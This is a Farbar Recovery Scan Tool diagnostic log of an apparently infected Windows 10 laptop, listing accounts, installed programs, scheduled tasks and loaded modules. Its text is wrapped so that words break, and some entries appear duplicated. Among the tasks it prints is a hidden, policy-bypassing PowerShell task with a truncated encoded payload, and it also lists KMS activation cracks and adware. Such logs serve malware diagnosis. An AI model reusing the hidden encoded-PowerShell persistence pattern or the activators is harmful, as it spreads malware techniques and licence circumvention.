Addition
November 13, 2016 | Author: rrutayisire | Category: N/A
Short Description
A text describing the scan problem....
Description
Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01 Ran by REVERIEN (2016-04-06 15:16:27) Running from C:\Users\REVERIEN\Desktop Windows 10 Home Version 1511 (X64) (2016-01-04 12:15:29) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-1240968423-981972810-3087361095-500 - Administrator - Di sabled) DefaultAccount (S-1-5-21-1240968423-981972810-3087361095-503 - Limited - Disable d) Guest (S-1-5-21-1240968423-981972810-3087361095-501 - Limited - Disabled) => C:\ Users\Guest HomeGroupUser$ (S-1-5-21-1240968423-981972810-3087361095-1003 - Limited - Enable d) REVERIEN (S-1-5-21-1240968423-981972810-3087361095-1001 - Administrator - Enable d) => C:\Users\REVERIEN ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF4 6} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF4 6} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to un hide them. The adware programs should be uninstalled manually.) Adobe Flash Player 21 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 21 .0.0.197 - Adobe Systems Incorporated) Adobe Photoshop 7.0 CE (HKLM-x32\...\Adobe Photoshop 7.0 CE) (Version: 7.0 CE Adobe Systems, Inc.) Adobe Reader 9.4.0 (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-A94000000001}) (Versio n: 9.4.0 - Adobe Systems Incorporated) Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1 .7.157 - Adobe Systems, Inc.) Aloha TriPeaks (x32 Version: 2.2.0.98 - WildTangent) Hidden Apache Tomcat 6.0 (remove only) (HKLM\...\Apache Tomcat 6.0) (Version: - ) Apple Application Support (32-bit) (HKLM-x32\...\{649A1FD9-5892-46AD-8DF0-C4A43F F61CB7}) (Version: 4.1 - Apple Inc.) Apple Application Support (64-bit) (HKLM\...\{0DE0A178-AC7B-4650-806C-CF226DE037 66}) (Version: 4.1 - Apple Inc.) Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Ver sion: 2.1.4.131 - Apple Inc.) ArcGIS 10.1 for Desktop (HKLM-x32\...\ArcGIS 10.1 for Desktop) (Version: 10.1.30 35 - Environmental Systems Research Institute, Inc.) ArcGIS 10.1 for Desktop (x32 Version: 10.1.3035 - Environmental Systems Research Institute, Inc.) Hidden ArcGIS 10.1 License Manager (HKLM-x32\...\ArcGIS 10.1 License Manager) (Version: 10.1.2891 - Environmental Systems Research Institute, Inc.) ArcGIS 10.1 License Manager (x32 Version: 10.1.2891 - Environmental Systems Rese arch Institute, Inc.) Hidden Auslogics Duplicate File Finder (HKLM-x32\...\{6845255F-15CC-4DD1-94D5-D38F37011
8B3}_is1) (Version: 5.0.1.0 - Auslogics Labs Pty Ltd) Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Ap ple Inc.) BufferChm (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden Cambridge Advanced Learner's Dictionary (HKLM-x32\...\Cambridge Advanced Learner 's Dictionary) (Version: - ) Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden Destinations (x32 Version: 140.0.0.0 - Hewlett-Packard) Hidden DNS Unlocker version 1.4 (HKLM-x32\...\{E1527582-8509-4011-B922-29E3FB548882}_is 1) (Version: 1.4 - www.dnsunlocker.com) C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.28.1\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{71 DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\REVERIEN\AppData\L ocal\Microsoft\OneDrive\17.3.6302.0225\FileCoAuth.exe (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{78 550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.28.13\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{79 3EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{82 0D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM. exe (Intel Corporation) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{C3 BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.26.9\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{CC 182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.29.1\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{D0 336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.25.11\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{D1 EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.28.15\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{E8 CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{EC D97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB C9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. T he file will not be moved unless listed separately.) Task: {037C1E69-2352-4B71-BF9F-41F90E188F8F} - System32\Tasks\{B427AFCD-2507-455 E-962F-0A755643BDDC} => pcalua.exe -a C:\Users\REVERIEN\Downloads\setup_basic_48 00_14-5(1).exe -d C:\Users\REVERIEN\Downloads Task: {06652989-4F08-4C22-9929-45FEAD589085} - System32\Tasks\{8B398634-E508-401 C-8F40-1E6B8018FAF9} => Firefox.exe hxxp://www.skype.com/go/downloading?source=l ightinstaller&ver=5.3.0.111.259&LastError=404 Task: {08F320F2-51C3-40FA-901E-6299F4ED245D} - System32\Tasks\Toshiba\CommonNoti fier => C:\Program Files (x86)\Toshiba TEMPRO\Toshiba.Tempro.UI.CommonNotifier.e xe [2013-01-04] (Toshiba Europe GmbH) Task: {1B3DA511-80EE-4124-9D8C-4214B6F9F7C7} - System32\Tasks\Trigger KMS Activa tion => C:\Program Files\KMSnano\TriggerKMS.exe [2013-01-26] () Task: {1B690D77-BED4-4BD3-87B3-77B30470B172} - System32\Tasks\{335127B4-0212-47B 8-A6F6-BB6DFEC8DC4C} => pcalua.exe -a C:\Users\REVERIEN\Documents\Downloads\Prog rams\pdf-annotator-5.exe -d C:\Users\REVERIEN\Documents\Downloads\Programs Task: {1C4D72AE-A136-44B9-AB6D-618DC414022A} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe Firefox.exe hxxp://www.skype.com/go/downloading?source=l ightinstaller&ver=5.3.0.111.259&LastError=404 Task: {435AE71D-CBDE-4DDF-A504-6D7A8DC77019} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [201 6-03-24] (Adobe Systems Incorporated) Task: {4754F53F-BCD6-4CEB-AE31-E3D1081F2919} - System32\Tasks\RealDownloader Upd ate Check => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [2016-02-03] () Task: {4899038C-645F-4F99-B06E-C6C53E90E8E8} - System32\Tasks\GoogleUpdateTaskUs erS-1-5-21-1240968423-981972810-3087361095-1001UA => C:\Users\REVERIEN\AppData\L ocal\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.) Task: {4D2B6648-C88F-42D0-801A-2BC13B0D4419} - System32\Tasks\Microsoft\Windows\ Setup\8.1 auto install ping => C:\Windows\system32\AutoUpdate.exe Task: {52FC6D96-0F79-4D7F-9016-C45F51E68844} - System32\Tasks\{B4A54807-95C1-4C5 6-AD99-3A2CF5B1A653} => pcalua.exe -a C:\Users\REVERIEN\Documents\Downloads\Prog rams\setup_basic_4800_14-5_2.exe -d C:\Users\REVERIEN\AppData\Roaming\IDM Task: {57B2A906-6471-42D9-813A-6ECC1BB8FE03} - System32\Tasks\Microsoft\Windows\ RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-15] (Microsoft Corpo ration) Task: {620EA6A0-7874-4884-8744-C548E5709A0F} - System32\Tasks\Microsoft\Office\O fficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-22] (Microsoft Corporation) Task: {698FBBBE-2414-4D8D-8C84-3409AD2E7EE0} - System32\Tasks\RealDownloaderReal UpgradeLogonTaskS-1-5-21-1240968423-981972810-3087361095-1001 => C:\Program File s (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [2016-02-03] (RealNetworks, Inc.) Task: {7194F166-8483-4E63-B348-4665129E173B} - System32\Tasks\Microsoft\Windows\ Setup\8.1 auto install v2 => C:\WINDOWS\system32\AutoUpdate.exe Task: {71B218C2-3599-478E-A2FD-5AD8943CB636} - System32\Tasks\{B7687898-7A46-489 6-A5EA-EF2E5B2F59D6} => pcalua.exe -a G:\RRutayis\Pavilion\Softwares\setup_basic _4800.exe -d G:\RRutayis\Pavilion\Softwares
Task: {7224D3F7-19A1-42EC-BECA-439673C57A55} - System32\Tasks\Microsoft\Office\O ffice 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Share d\Office15\OLicenseHeartbeat.exe Task: {74DE945E-A8A9-46D9-B7C6-43D6200BA2FF} - System32\Tasks\AutoKMS => C:\WIND OWS\AutoKMS\AutoKMS.exe [2016-04-02] () Task: {7D852E04-7098-426F-97C2-C15FEBB19066} - System32\Tasks\{E0A32E87-8F44-4B7 3-8A8D-7619716B55C8} => Firefox.exe hxxp://www.skype.com/go/downloading?source=l ightinstaller&ver=5.3.0.111.259&LastError=404 Task: {86BE8531-BCDB-49B1-BB53-F1B51B1F2651} - System32\Tasks\Microsoft\Office\O fficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia. exe [2014-01-22] (Microsoft Corporation) Task: {86F486B0-1990-4CFA-8DC2-329407DD0A02} - System32\Tasks\DropboxUpdateTaskU serS-1-5-21-1240968423-981972810-3087361095-1001Core => C:\Users\REVERIEN\AppDat a\Local\Dropbox\Update\DropboxUpdate.exe [2015-08-21] (Dropbox, Inc.) Task: {872982BD-00DC-422F-B1CE-6E49E2B5AB8D} - System32\Tasks\Synaptics TouchPad Enhancements => Program Files\Synaptics\SynTP\SynTPEnh.exe Task: {8FE78DF6-0309-4FB0-B487-BF13C767D48D} - System32\Tasks\DNSWALTERS => C:\P rogram Files (x86)\DNS Unlocker\dnswalters.exe [2016-02-28] () C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [2016-02-03] (RealNetwor ks, Inc.) Task: {9FA8A24B-5779-4D13-ABBD-0AEA47FDA1C1} - System32\Tasks\Apple\AppleSoftwar eUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015 -08-27] (Apple Inc.) Task: {A6597B70-BC68-4E4E-9418-E07ADAB6CD49} - System32\Tasks\TOSHIBA\Service St ation => C:\Program Files\TOSHIBA\Toshiba Service Station\ToshibaServiceStation. exe [2012-07-27] (TOSHIBA Corporation) Task: {A6A1D5E0-2A0D-4605-8355-ED76B01EE13A} - System32\Tasks\GoogleUpdateTaskMa chineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-03-18] (G oogle Inc.) Task: {A7B29358-293E-4C2F-B46F-0E6B97C3127C} - System32\Tasks\MySQLNotifierTask => C:\Program Files (x86)\MySQL\MySQL Notifier 1.1\MySQLNotifier.exe [2014-09-03 ] (Oracle Corporation) Task: {B00C6F1F-19F7-4CC1-9F4F-90B9FCC800B9} - System32\Tasks\GoogleUpdateTaskUs erS-1-5-21-1240968423-981972810-3087361095-1001Core => C:\Users\REVERIEN\AppData \Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.) Task: {B03DB1DA-0393-410C-AA42-6251752AE6FD} - System32\Tasks\MySQL\Installer\Ma nifestUpdate => C:\Program Files (x86)\MySQL\MySQL Installer for Windows\MySQLIn stallerConsole.exe [2015-08-20] (Oracle Corporation) Task: {BFE355E8-32FA-4BD6-A3F7-D792E36D5785} - System32\Tasks\DropboxUpdateTaskU serS-1-5-21-1240968423-981972810-3087361095-1001UA => C:\Users\REVERIEN\AppData\ Local\Dropbox\Update\DropboxUpdate.exe [2015-08-21] (Dropbox, Inc.) Task: {C238B4A8-4D88-4DDD-B77A-77590C626E69} - System32\Tasks\{2574E1B5-210F-414 9-B661-A7C1B5BE2AEC} => Firefox.exe hxxp://www.skype.com/go/downloading?source=l ightinstaller&ver=5.3.0.111.259&LastError=404 Task: {D96737D8-8E0D-49DB-9B1D-DABEBEB00626} - System32\Tasks\{0E0E7947-0D0D-090 5-0D11-0D087A0D110A} => powershell.exe -nologo -executionpolicy bypass -noninter active -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByA GUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDA G8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzA GMAOwAkAFAAcgBvAGcA (the data entry has 9416 more characters). Task: {DA4CFD73-5939-4F16-A5D5-2F25F0354A4E} - System32\Tasks\{71C07501-74AE-CA4 7-A919-ECBA39E73D0C} => C:\WINDOWS\system32\regsvr32.exe [2015-10-30] (Microsoft Corporation) Task: {DF2B3ACD-B3A9-44E0-A1F7-78CFF05EE2E5} - System32\Tasks\{D2750D47-E820-40A 5-94CA-A5BAEEC0E056} => Firefox.exe hxxp://www.skype.com/go/downloading?source=l ightinstaller&ver=5.3.0.111.259&LastError=404 Task: {DF39BBDD-F0B3-4FAD-ABF1-F2A8B63CA7CC} - System32\Tasks\GoogleUpdateTaskMa chineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-03-18]
(Google Inc.) Task: {F22B8338-9644-4660-BE5D-D422066ECD42} - System32\Tasks\RealDownloaderDown loaderScheduledTaskS-1-5-21-1240968423-981972810-3087361095-1001 => C:\Program F iles (x86)\RealNetworks\RealDownloader\recordingmanager.exe [2016-02-03] (RealNe tworks, Inc.) Task: {F29AEFCF-3872-459A-BE83-E74679F989F2} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [2015-08-19] (ReimageĀ®) C:\WINDOWS\SysWOW64\Mac romed\Flash\FlashPlayerUpdateService.exe Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1240968423-981972810-308736 1095-1001Core.job => C:\Users\REVERIEN\AppData\Local\Dropbox\Update\DropboxUpdat e.exe Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1240968423-981972810-308736 1095-1001UA.job => C:\Users\REVERIEN\AppData\Local\Dropbox\Update\DropboxUpdate. exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86) \Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\G oogle\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1240968423-981972810-3087361 095-1001Core.job => C:\Users\REVERIEN\AppData\Local\Google\Update\GoogleUpdate.e xe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1240968423-981972810-3087361 095-1001UA.job => C:\Users\REVERIEN\AppData\Local\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\S ynaptics\SynTP\SynTPEnh.exe Task: C:\WINDOWS\Tasks\WebReg .job => C:\Program Files (x86)\HP\Digital Imaging\ bin\hpqwrg.exe ==================== Shortcuts ============================= (The entries could be listed to be restored or removed.) ShortcutWithArgument: C:\Users\Public\Desktop\Quantum GIS Desktop (1.8.0).lnk -> C:\Program Files (x86)\Quantum GIS Lisboa\bin\nircmd.exe (NirSoft) -> exec hide "C:\Program Files (x86)\Quantum GIS Lisboa\bin\qgis.bat" ==================== Loaded Modules (Whitelisted) ============== 2011-10-13 15:38 - 2011-10-13 15:38 - 00156672 OSHIBA\Password Utility\GFNEXSrv.exe 2014-12-24 17:10 - 2014-08-06 03:04 - 01441792 ing\Everything.exe 2016-03-11 20:25 - 2013-11-15 14:38 - 00066048 EALTEK\Realtek Bluetooth\BTDevMgr.exe 2015-09-18 17:53 - 2015-09-18 17:53 - 13067264 ySQL Server 5.6\bin\mysqld.exe 2016-02-03 18:49 - 2016-02-03 18:49 - 00032544 eal\UpdateService\RealPlayerUpdateSvc.exe 2015-08-19 10:56 - 2015-08-19 10:56 - 06908904 \Reimage Protector\ReiSystem.exe 2015-10-30 09:18 - 2015-10-30 09:18 - 00185856 2k.dll 2016-03-02 19:05 - 2016-02-23 13:27 - 02654872 UIComponents.dll
_____ () C:\Program Files (x86)\T _____ () C:\Program Files\Everyth _____ () C:\Program Files (x86)\R _____ () C:\Program Files\MySQL\M _____ () C:\Program Files (x86)\R _____ () C:\Program Files\Reimage _____ () C:\WINDOWS\SYSTEM32\ism3 _____ () C:\WINDOWS\system32\Core
2016-03-02 19:05 - 2016-02-23 13:27 - 02654872 _____ () C:\WINDOWS\System32\Core UIComponents.dll 2015-10-13 15:07 - 2015-10-13 15:07 - 08901184 _____ () C:\Program Files\Microso ft Office\Office15\1033\GrooveIntlResource.dll 2016-01-05 11:44 - 2015-12-07 06:14 - 00093696 _____ () C:\Windows\SystemApps\Sh ellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll 2016-03-02 19:05 - 2016-02-23 10:36 - 00472064 _____ () C:\Windows\SystemApps\Sh ellExperienceHost_cw5n1h2txyewy\QuickActions.dll 2015-10-21 10:47 - 2007-07-18 16:15 - 00020480 _____ () C:\Windows\System32\spoo l\drivers\x64\3\WrtMon.exe 2016-02-08 22:38 - 2016-02-08 22:38 - 01110048 _____ () C:\Users\REVERIEN\AppDat a\Local\MalwareProtectionLive\MalwareProtectionClient.exe 2016-03-16 12:25 - 2016-02-28 11:46 - 00678912 _____ () C:\Program Files (x86)\D NS Unlocker\dnswalters.exe 2016-02-02 09:38 - 2016-02-03 11:58 - 00144384 _____ () C:\Program Files\Windows Apps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe 2016-03-29 22:12 - 2016-03-31 10:07 - 00016896 _____ () C:\Program Files\Windows Apps\Microsoft.Windows.Photos_16.325.12390.0_x64__8wekyb3d8bbwe\Microsoft.Photos .exe 2016-03-29 22:12 - 2016-03-31 10:07 - 17535488 _____ () C:\Program Files\Windows Apps\Microsoft.Windows.Photos_16.325.12390.0_x64__8wekyb3d8bbwe\Microsoft.Photos .dll 2016-03-04 12:16 - 2016-03-04 12:16 - 00291328 _____ () C:\Program Files\Windows Apps\Microsoft.Windows.Photos_16.325.12390.0_x64__8wekyb3d8bbwe\StoreRatingPromo tion.dll 2015-04-08 13:39 - 2015-04-08 13:39 - 00468480 _____ () C:\Program Files (x86)\M endeley Desktop\MendeleyWordPlugin.exe 2016-02-03 18:00 - 2016-02-03 18:00 - 00712432 _____ () C:\Program Files (x86)\R ealNetworks\RealDownloader\downloader2.exe 2016-01-13 13:53 - 2016-01-05 03:29 - 07992832 _____ () C:\Windows\SystemApps\Mi crosoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll 2016-01-13 13:53 - 2016-01-05 03:23 - 00591360 _____ () C:\Windows\SystemApps\Mi crosoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2016-02-03 16:21 - 2016-01-16 07:10 - 02483200 _____ () C:\Windows\SystemApps\Mi crosoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll 2016-02-03 16:21 - 2016-01-16 07:13 - 04089856 _____ () C:\Windows\SystemApps\Mi crosoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll 2016-02-03 18:48 - 2016-02-03 18:48 - 00037688 _____ () C:\Program Files (x86)\R eal\UpdateService\DL2UpdatePlugin.dll 2016-02-03 18:48 - 2016-02-03 18:48 - 00039224 _____ () C:\Program Files (x86)\R eal\UpdateService\RealDownloaderUpdatePlugin.dll 2016-02-03 18:49 - 2016-02-03 18:49 - 00037192 _____ () C:\Program Files (x86)\R eal\UpdateService\VideoDLUpdatePlugin.dll 2013-03-28 07:14 - 2012-06-25 12:41 - 01198912 _____ () C:\Program Files (x86)\I ntel\Intel(R) Management Engine Components\UNS\ACE.dll 2016-02-03 18:00 - 2016-02-03 18:00 - 00077552 _____ () C:\Program Files (x86)\R ealNetworks\RealDownloader\dtvhooks.dll 2016-02-29 20:12 - 2016-02-29 20:12 - 00089328 _____ () c:\program files (x86)\r eal\realplayer\CrashRpt\CrashRpt1402.dll 2016-02-29 20:09 - 2016-02-29 20:09 - 00022288 _____ () c:\program files (x86)\r eal\realplayer\RPDS\Tools\ffmpeg\mediautil.dll 2016-02-29 20:09 - 2016-02-29 20:09 - 04274960 _____ () c:\program files (x86)\r eal\realplayer\RPDS\Tools\ffmpeg\avcodec-55.dll 2016-02-29 20:09 - 2016-02-29 20:09 - 01520912 _____ () c:\program files (x86)\r eal\realplayer\RPDS\Tools\ffmpeg\avformat-55.dll 2016-02-29 20:09 - 2016-02-29 20:09 - 00322832 _____ () c:\program files (x86)\r eal\realplayer\RPDS\Tools\ffmpeg\avutil-52.dll 2016-04-06 09:29 - 2016-04-06 09:29 - 00098816 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32api.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00110080 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\pywintypes27.dll 2016-04-06 09:29 - 2016-04-06 09:29 - 00364544 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\pythoncom27.dll 2016-04-06 09:29 - 2016-04-06 09:29 - 00320512 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32com.shell.shell.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00776704 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_hashlib.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 01176576 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._core_.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00806400 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._gdi_.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00816128 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._windows_.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 01067008 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._controls_.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00733184 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._misc_.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00682496 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\pysqlite2._sqlite.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00088064 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_ctypes.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00119808 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32file.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00108544 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32security.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00007168 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\hashobjs_ext.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00017920 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\thumbnails_ext.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00088064 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\usb_ext.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00167936 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32gui.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00018432 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32event.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00046080 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_socket.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 01208320 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_ssl.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00128512 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_elementtree.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00127488 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\pyexpat.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00013824 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\common.time34.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00038912 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32inet.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00036864 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_psutil_windows.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00525208 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\windows._lib_cacheinvalidation.pyd 